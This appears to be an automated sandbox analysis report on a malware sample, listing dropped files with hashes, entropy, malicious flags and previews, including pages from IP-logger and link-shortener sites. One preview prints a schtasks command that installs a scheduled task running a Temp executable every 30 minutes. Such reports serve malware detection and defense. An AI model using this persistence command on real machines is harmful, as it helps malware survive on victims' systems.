                                                                                                                                                                                                                                                            Entropy (8bit):4.505190219336192
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="UTF-8" />. <meta http-equiv="X-UA-Compatible" content="IE=edge" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <title>Document</title>. <style>. . body {. padding: 20px;. background-color: #f6f8fc;. }. .main {. width: 900px;. margin: 0 auto;. text-align: center;. background-color: #fff;. padding: 20px;. }. .main h2 {. padding-bottom: 20px;. }. .main a {. background: #1a73e8;. color: #fff;. height: 40px !important;. display: block;. width: 100px !important;. margin: 0 auto;. line-height: 38px !important;. margin-top: 20px;. outline: none;. border: 1px solid;. font-size: 16px;. cursor: pointer;. text-decoration: none;. }. input {. height: 32px;. line-height: 32px;. background-color
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 222 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2967
                                                                                                                                                                                                                                                            Entropy (8bit):7.913357508524536
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 400 x 400, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2315
                                                                                                                                                                                                                                                            Entropy (8bit):6.943143412126543
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:zEbbbzUbsSJ1kbrSAkbreb3bydbcqRbhS7SejSZQ7SknTb6ASme9HSBNSEbz5zSy:e0mSXwCrCDbST3YZUu
                                                                                                                                                                                                                                                            MD5:93A1A761D17CA266066A4B8E286DAC1D
                                                                                                                                                                                                                                                            SHA1:63B13D8F13FE092AA1CD18DFEA86C8C4CF2D5A8D
                                                                                                                                                                                                                                                            SHA-256:BAD6F97F076CF04517A03820B486A2FFE564C2D0EF350932612CC40BEEC39F6A
                                                                                                                                                                                                                                                            SHA-512:5D3360D096DA7A6B724CC68504DAC6691285807F2ACA361BBE27CA22ACDFE734ABF4EE4A4E2F9C55D7F94BB22D50062B19AF0A4DD34939CF4673BAA1746871BC
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):129
                                                                                                                                                                                                                                                            Entropy (8bit):4.809875578583948
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:HFUuvaOpLKBchEXEtTC5WAuUkh4E2J5xAIEyrKBySKFS3:Ogas7SXEFAu923faKS3
                                                                                                                                                                                                                                                            MD5:A60AD3B864BC5B7F3BC6056968D8343B
                                                                                                                                                                                                                                                            SHA1:308D6F187B22DDCA1F6328F799EF62E1C505FF61
                                                                                                                                                                                                                                                            SHA-256:9FA192F23FAB9E060AA78499C4B77D7479504903DF0B4B5C458F699FFBDB7CB5
                                                                                                                                                                                                                                                            SHA-512:9A59F89C404CAF5EAD1DC8127F1AA62083BD5324C8E111E3A8724C6427E83E05980FF7197F919A787E7DD66B08EE41C962B97A5DF9B6A771C3E7084289548133
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:chcp 1251.. schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F..
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):323584
                                                                                                                                                                                                                                                            Entropy (8bit):6.109731815911019
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:HvEczeu14403Cgega/YYn13VguOBft5QRt15VbvVXbzMbtdu:PEcv144/getAfQZfbNrgzu
                                                                                                                                                                                                                                                            MD5:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            SHA1:0D89E46868396DF24B3113D778A9ACDD81ECBE2A
                                                                                                                                                                                                                                                            SHA-256:DB184DF3910B9B55E6F47E316D8F4CE4D9213A2BCA188A53201A57301352AA52
                                                                                                                                                                                                                                                            SHA-512:5D3CB21DCE95B6A9958205F794DB293EF75BB3ED1DCA9ED1ABC2A81D2D4D6CD9891A028FC7F325CF3D7DE91F75CF3D912FEE491947976A76C07E8B7A3EF9C977
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):323584
                                                                                                                                                                                                                                                            Entropy (8bit):6.109731815911019
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:HvEczeu14403Cgega/YYn13VguOBft5QRt15VbvVXbzMbtdu:PEcv144/getAfQZfbNrgzu
                                                                                                                                                                                                                                                            MD5:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            SHA1:0D89E46868396DF24B3113D778A9ACDD81ECBE2A
                                                                                                                                                                                                                                                            SHA-256:DB184DF3910B9B55E6F47E316D8F4CE4D9213A2BCA188A53201A57301352AA52
                                                                                                                                                                                                                                                            SHA-512:5D3CB21DCE95B6A9958205F794DB293EF75BB3ED1DCA9ED1ABC2A81D2D4D6CD9891A028FC7F325CF3D7DE91F75CF3D912FEE491947976A76C07E8B7A3EF9C977
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.594677771219723
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Q3svbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:6YbGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:74446C42022C98940CD36557F86CF70F
                                                                                                                                                                                                                                                            SHA1:7BDA0A0ADF388D0A8453E6ABF95813C0FFA004FE
                                                                                                                                                                                                                                                            SHA-256:7B938756330EB7F068A6CEF946E48DA88A9DC29436B74D53C3E93CCC5723DC3C
                                                                                                                                                                                                                                                            SHA-512:84821078B56644983DE24D42B5D6F09418A6A494501222A91076E1F7952AF7500DA99A2EE3F7E3521A2A70D175B9740B5D4E29B7C1871BAC59A54554A4F45A2F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="BOPOOga9PnHIY4Wjqn43t1H2YlnkF1vf5vVtMpYI">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):323584
                                                                                                                                                                                                                                                            Entropy (8bit):6.109731815911019
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:HvEczeu14403Cgega/YYn13VguOBft5QRt15VbvVXbzMbtdu:PEcv144/getAfQZfbNrgzu
                                                                                                                                                                                                                                                            MD5:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            SHA1:0D89E46868396DF24B3113D778A9ACDD81ECBE2A
                                                                                                                                                                                                                                                            SHA-256:DB184DF3910B9B55E6F47E316D8F4CE4D9213A2BCA188A53201A57301352AA52
                                                                                                                                                                                                                                                            SHA-512:5D3CB21DCE95B6A9958205F794DB293EF75BB3ED1DCA9ED1ABC2A81D2D4D6CD9891A028FC7F325CF3D7DE91F75CF3D912FEE491947976A76C07E8B7A3EF9C977
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283768
                                                                                                                                                                                                                                                            Entropy (8bit):7.982051005050529
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:+2m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3H4:+LIvF/H3d7z7Y3UUtoH4
                                                                                                                                                                                                                                                            MD5:54F38AF9A5ADA40065F7B6008661E8A1
                                                                                                                                                                                                                                                            SHA1:6CE570E927D57E05F9FA25A37EAF0FB62CEFAF8A
                                                                                                                                                                                                                                                            SHA-256:AC365E2F49564BA5ABA374317FFB9AC29A20B338DB67DEC02D459C9AB85DE637
                                                                                                                                                                                                                                                            SHA-512:50DB5C233C258C0B99F868C4279CDBAB1FB252B5F87EFB207E865BA14F49ECC415AF329B379982072427120BF72250E434F1A9AD938342F3DFD40C31E84401D4
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.599143365271236
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:QiQvbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:38bGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:7917747B96350149925033AC9DA849A2
                                                                                                                                                                                                                                                            SHA1:B1EC9587BFC9A6F23C428243055C7C3AF360158C
                                                                                                                                                                                                                                                            SHA-256:D1C53BC1B3F14231A78C1F09D9792CCAFFC498CC841B7C6D5DDC46C04C3EECD6
                                                                                                                                                                                                                                                            SHA-512:E6C27B76BBA2BDF7D582450A2B7E0DC155318748B0F243C8DF9297E201D3DFC275726AB313F8040ECD42E09ED68E8C55932DF7B0BD9826DACD7FE50F5600A83C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="zK3dWOfNGw8zLX9jYxrZwz92L6uiXNEyOnJuj3Z7">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.594861019789154
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Qb2nvbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:w2bGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:0769572513C30B28FDE9AF98E9B13949
                                                                                                                                                                                                                                                            SHA1:41FB473DC320358B93B7221FABED7CA31669A302
                                                                                                                                                                                                                                                            SHA-256:F8F445EF6E8E3BF02685B83840F74B80FE01706080BE9613A78AC00A768B0505
                                                                                                                                                                                                                                                            SHA-512:8F41634995BCF5B16265BBD38B3027EFA578CB2B1DB18F489E0829FE858D8D9DABB661C6D43C6112E7207CF984CEC4AE61513026AD5CEC1E9F5E2E1EFCC16217
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="jYgOIngVfFmRJ6V6tU8oFQ1JEeyUog6pPo2mv5jN">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283792
                                                                                                                                                                                                                                                            Entropy (8bit):7.9820526704646255
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:22m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3HH:2LIvF/H3d7z7Y3UUtoHH
                                                                                                                                                                                                                                                            MD5:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            SHA1:BF8C0FF33582B6CD9E2BBBB243B1F4551810ED56
                                                                                                                                                                                                                                                            SHA-256:7FBC9C8489F4AC1D85322892552012650A68307902FECEC265F01F994369A35E
                                                                                                                                                                                                                                                            SHA-512:E25315483A070AD2AF3876B8818DC25F491B91617987F30C10CEBE31177CB5FB08BA6DF20B898C19F06840CB6796E5B846ECF715A13A7BA88C46EFB0A393B957
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E^.q+..q+..q+......q+......q+......q+......q+..q*..q+......q+......q+......q+.Rich.q+.........PE..L...+.Mc.....................\E...................@...................................B.....................................,.@.(....pE..w...........RA.................................................................L............................text...t........................... ..`.rdata....@.......@.................@..@.data... .....@..(....@.............@....rsrc....GL..pE..x....@.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|....p...............................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc........p......................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):7446
                                                                                                                                                                                                                                                            Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                                            MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                                            SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                                            SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                                            SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283768
                                                                                                                                                                                                                                                            Entropy (8bit):7.982051005050529
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:+2m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3H4:+LIvF/H3d7z7Y3UUtoH4
                                                                                                                                                                                                                                                            MD5:54F38AF9A5ADA40065F7B6008661E8A1
                                                                                                                                                                                                                                                            SHA1:6CE570E927D57E05F9FA25A37EAF0FB62CEFAF8A
                                                                                                                                                                                                                                                            SHA-256:AC365E2F49564BA5ABA374317FFB9AC29A20B338DB67DEC02D459C9AB85DE637
                                                                                                                                                                                                                                                            SHA-512:50DB5C233C258C0B99F868C4279CDBAB1FB252B5F87EFB207E865BA14F49ECC415AF329B379982072427120BF72250E434F1A9AD938342F3DFD40C31E84401D4
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283792
                                                                                                                                                                                                                                                            Entropy (8bit):7.9820526704646255
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:22m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3HH:2LIvF/H3d7z7Y3UUtoHH
                                                                                                                                                                                                                                                            MD5:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            SHA1:BF8C0FF33582B6CD9E2BBBB243B1F4551810ED56
                                                                                                                                                                                                                                                            SHA-256:7FBC9C8489F4AC1D85322892552012650A68307902FECEC265F01F994369A35E
                                                                                                                                                                                                                                                            SHA-512:E25315483A070AD2AF3876B8818DC25F491B91617987F30C10CEBE31177CB5FB08BA6DF20B898C19F06840CB6796E5B846ECF715A13A7BA88C46EFB0A393B957
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283792
                                                                                                                                                                                                                                                            Entropy (8bit):7.9820526704646255
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:22m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3HH:2LIvF/H3d7z7Y3UUtoHH
                                                                                                                                                                                                                                                            MD5:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            SHA1:BF8C0FF33582B6CD9E2BBBB243B1F4551810ED56
                                                                                                                                                                                                                                                            SHA-256:7FBC9C8489F4AC1D85322892552012650A68307902FECEC265F01F994369A35E
                                                                                                                                                                                                                                                            SHA-512:E25315483A070AD2AF3876B8818DC25F491B91617987F30C10CEBE31177CB5FB08BA6DF20B898C19F06840CB6796E5B846ECF715A13A7BA88C46EFB0A393B957
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.605017626199463
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:QpYvbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:jbGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:DCDC0E11DB8E41D2820D5795541A9A31
                                                                                                                                                                                                                                                            SHA1:53C1D8B34BFB19D317396215009C578BDCA4C588
                                                                                                                                                                                                                                                            SHA-256:9620D42FC1944BDA67B72BC68E33A9DFDCB598F4AB795F80DB8FAEEB98D1F31D
                                                                                                                                                                                                                                                            SHA-512:DE5B0CBD74CEE1FD4A9E861B233F97B491C13C041F6B1E46203D406DC22501AF7B3FA6506668673684E4B29CB6BBE0156F4EF31BC73C0490A137D792F4B19064
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="FJNDnYI5mDUPWn1na0VszHBNAXQlUkP2CQRFMTTa">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.591439924230012
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:QUnvbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:RvbGRTihhL6HXYc
